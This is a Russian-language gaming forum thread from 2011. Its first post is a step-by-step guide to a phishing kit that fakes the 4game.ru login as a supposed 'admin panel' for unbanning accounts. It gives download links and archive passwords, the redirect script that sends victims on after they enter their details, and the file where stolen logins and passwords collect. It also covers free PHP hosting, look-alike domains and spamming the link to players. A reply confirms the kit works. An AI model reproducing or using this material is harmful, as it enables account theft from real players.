• Страница 1 из 1
  • 1
Модератор форума: BioWare, МaSяня, DENISSISS, ™Наркоборон™  
Куча твинков?
DENISSISS
Дата: Четверг, 20.10.2011, 21:31 | Сообщение # 1; Репутация DENISSISS: "2947"; Титул DENISSISS: Создатель, Генералиссимус;

255
Награды

За заслуги перед сайтом За репутацию больше 1000! За >200 постов! За >10 наград!

Понизить
Делаем крутой фейк.
[hide=50]
Если кто не вкурсе - админ панель это популярная легенда, среди школоты. С помощью нее можно разбанит/забанить любой акк.
А я собственно, переделал фейк 4game.ru под админ панель.
Разбираем фейк.
Фейк предельно прост, если не хотите ничего менять можно юзать сразу.Без настроек.
1)Скачиваем архив с фейком Кликабельно

РЕЗЕРВ АРХИВА БЕЗ ПАРОЛЯ:
http://gamexak-wh.3dn.ru/1313854368_www.rar

Пароль на скачку PbHaCk
Пароль к архиву hack-fuck.tk
Файл send.php отвечает за переадресацию жертвы после ввода данных.
Code
<html>
<script>
function lol(){
location.href="https://support.4game.ru";}
</script>
<body onload="lol();">
</body>
</html>

Как видите, я поставил переадресацию на support.4game.ru, можете поставить 4game.ru, тогда, если пароль сохранен в браузере жертва попадет в свой профиль, а введенный пароль и логин будет уже у нас, что вряд ли заподозрят. Введенные логины и пароли сохраняются в файл hack-fuck.tk.diz.
Установка.
Для установки нам подойдет любой хостинг с поддержкой php, я использую бесплатный hut.ru. После регистрации вам дадут данные для доступа по ftp. Для доступа я использую прогу Filezila. Подключившись вы увидите на сервере папку WWW, в нее нужно скопировать наши файлы. Собственно все, проверьте, введя свой домен и введя любые данные, сохраняются ли они. если вы ничего не модифицировали сайт будет выглядеть так:

Заключение.
При регистрации на хостинге делайте домен перекликающийся с 4game или adminpanel. Лично я регистрирую левый адрес, потом прикручиваю более красивый, так как домен 4game.hut.ru у многих вызовет подозрение.Но не у всех. Как впаривать эту панель - воля ваша, если ничего умней не придумали - спамьте в игре или на сайтах (только не на хак-факе ). Знайте, что ваш фейк не вечен, он будет стоять пока вас не арестуют хостинг его не спалит и не удалит. Мой простоял долго, 3-4 месяца. Удачной охоты!
З.Ы. Народная мудрость: Без лоха и жизнь плоха!

П.С, копипаст

[/hide]

happy
Просто
Дата: Пятница, 21.10.2011, 14:01 | Сообщение # 2; Репутация Просто: "64"; Титул Просто: Лейтенант;

79
Награды

За заслуги перед сайтом За репутацию больше 50! За >50 постов! За >3 наград!

Понизить
Спс биг робит

Баги для читера - средство выживания...
Баги для админа - Веревка и мыло...;)
если заслуживаю не желейте поставте +

И сново я вернулся
  • Страница 1 из 1
  • 1
Поиск: